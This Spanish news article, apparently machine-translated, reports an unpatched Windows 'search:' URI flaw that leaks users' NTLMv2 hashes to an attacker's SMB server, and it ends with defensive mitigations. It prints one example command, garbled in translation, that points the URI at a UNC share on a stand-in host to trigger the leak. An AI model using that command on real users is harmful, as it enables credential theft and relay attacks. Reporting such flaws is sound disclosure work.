Cerrar menú
  • Inicio
  • Identidad
  • Inventos
  • Futuro
  • Ciencia
  • Startups
  • English
What's Hot

Cómo reducir la sobrecarga de Nivel 1

El papel de Tampere como contribuyente clave a las ambiciones de semiconductores de Europa destacado por el jefe de tecnología de la UE

Un proceso catalítico convierte residuos plásticos mezclados en aceite apto para su reutilización

Facebook X (Twitter) Instagram
  • Home
  • Contáctenos
  • DMCA
  • Política de Privacidad
  • Sobre Nosotros
  • Términos y Condiciones
  • 📢 Anúnciate con Nosotros
  • Enviar publicaciones
FySelf Noticias
  • Inicio
  • Identidad
  • Inventos
  • Futuro
  • Ciencia
  • Startups
  • English
FySelf Noticias
Home»Identidad»Una vulnerabilidad no parcheada en el URI de búsqueda de Windows permite a los atacantes robar hashes NTLMv2
Identidad

Una vulnerabilidad no parcheada en el URI de búsqueda de Windows permite a los atacantes robar hashes NTLMv2

corp@blsindustriaytecnologia.comBy corp@blsindustriaytecnologia.comjunio 3, 2026No hay comentarios3 minutos de lectura
Share Facebook Twitter Pinterest Telegram LinkedIn Tumblr Email Copy Link
Follow Us
Google News Flipboard
Share
Facebook Twitter LinkedIn Pinterest Email Copy Link

Ravi Lakshmanan3 de junio de 2026Vulnerabilidad/Seguridad de la red

Investigadores de ciberseguridad han revelado detalles de un problema sin parchear que podría explotarse para revelar los hashes NTLMv2 de los usuarios a los atacantes.

Al igual que CVE-2026-33829, que afectó al controlador ms-screensketch: URI de la herramienta de recorte de Windows, Huntress dijo que el problema recientemente informado está en la búsqueda: controlador URI.

CVE-2026-33829 hace referencia a una vulnerabilidad de suplantación de identidad que podría exponer información confidencial a un atacante no autorizado. Parcheado por Microsoft en abril de 2026.

«Al incrustar el enlace en una página web o mensaje de correo electrónico, un atacante podría engañarlo para que haga clic en un enlace especialmente diseñado en un navegador web u otra fuente URL», dijo Microsoft en un aviso en ese momento.

«Si el usuario aprueba el inicio del enlace, una URL diseñada podría engañar a la computadora para que se conecte a un servidor SMB elegido por el atacante. Esto podría revelar el hash NTLMv2 del usuario al atacante, quien luego podría usarlo para autenticarse como usuario».

Específicamente, el problema estaba relacionado con el hecho de que el controlador de URI de la herramienta de recorte aceptó un parámetro «filePath», no pudo validarlo y accedió a cualquier ruta de la Convención de nomenclatura universal (UNC) que se le pasó. Esto podría activar la autenticación NTLM y exponer el hash Net-NTLMv2 de la víctima al atacante.

El inconveniente recién descubierto es utilizar un comando como el siguiente para lograr el mismo objetivo final usando «search:» y «crumb=location:» en lugar de «filePath».

Inicio «» «Buscar:Consulta=Prueba&Cram=Ubicación:\\10.0.1.100\share»

El investigador de Huntress, Andrew Schwartz, dijo: «Se utilizó el mismo mecanismo de fuga NTLM, se produjo la misma fuga Net-NTLMv2, estaban presentes los mismos requisitos previos y la misma calificación moderada». Vale la pena señalar que Varonis documentó el uso del parámetro «crumb» para robar hashes (CVE-2023-35636) en febrero de 2024.

Como resultado, un atacante podría aprovechar los hashes capturados para realizar ataques de retransmisión y obtener un acceso más profundo a la red. Después de una divulgación responsable el 15 de abril de 2026, Microsoft se negó a abordar el problema y afirmó que «solo los casos importantes y graves cumplen con nuestros estándares de servicio».

A falta de una solución, recomendamos bloquear el SMB saliente (TCP/445 y TCP/139) en los hosts que no lo requieren, aplicar la firma SMB para que los hashes capturados no se transmitan a los servicios internos y deshabilitar NTLM, si corresponde.


Source link

#BlockchainIdentidad #Ciberseguridad #ÉticaDigital #IdentidadDigital #Privacidad #ProtecciónDeDatos
Follow on Google News Follow on Flipboard
Share. Facebook Twitter Pinterest LinkedIn Tumblr Email Copy Link
Previous ArticleLa nueva vulnerabilidad de bomba HTTP/2 permite DoS remoto en NGINX, Apache, IIS, Envoy, Cloudflare
Next Article La Universidad de Kansas mejora la detección de PFAS en el agua potable
corp@blsindustriaytecnologia.com
  • Website

Related Posts

Cómo reducir la sobrecarga de Nivel 1

junio 8, 2026

VerdantBamboo lleva la variante BSD de BRICKSTORM a los dispositivos Linux

junio 8, 2026

UNC3753 Vishing e intrusión física utilizados en una campaña de extorsión por robo de datos en EE. UU.

junio 8, 2026
Add A Comment
Leave A Reply Cancel Reply

el último

Cómo reducir la sobrecarga de Nivel 1

El papel de Tampere como contribuyente clave a las ambiciones de semiconductores de Europa destacado por el jefe de tecnología de la UE

Un proceso catalítico convierte residuos plásticos mezclados en aceite apto para su reutilización

VerdantBamboo lleva la variante BSD de BRICKSTORM a los dispositivos Linux

Publicaciones de tendencia

Suscríbete a las noticias

Suscríbete a nuestro boletín informativo y no te pierdas nuestras últimas noticias.

Suscríbete a mi boletín informativo para recibir nuevas publicaciones y consejos. ¡Manténgase al día!

Noticias Fyself es un medio digital dedicado a brindar información actualizada, precisa y relevante sobre los temas que están moldeando el futuro: economía, tecnología, startups, invenciones, sostenibilidad y fintech.

el último

TwinH Presenta una Tecnología Revolucionaria para Cocinas Inteligentes

¡Conoce a tu gemelo digital! La IA de vanguardia de Europa que está personalizando la medicina

TwinH: El cambio de juego de la IA para servicios legales más rápidos y accesibles

Facebook X (Twitter) Instagram Pinterest YouTube
  • Home
  • Contáctenos
  • DMCA
  • Política de Privacidad
  • Sobre Nosotros
  • Términos y Condiciones
  • 📢 Anúnciate con Nosotros
  • Enviar publicaciones
© 2026 noticias.fyself. Designed by noticias.fyself.

Escribe arriba y pulsa Enter para buscar. Pulsa Esc para cancelar.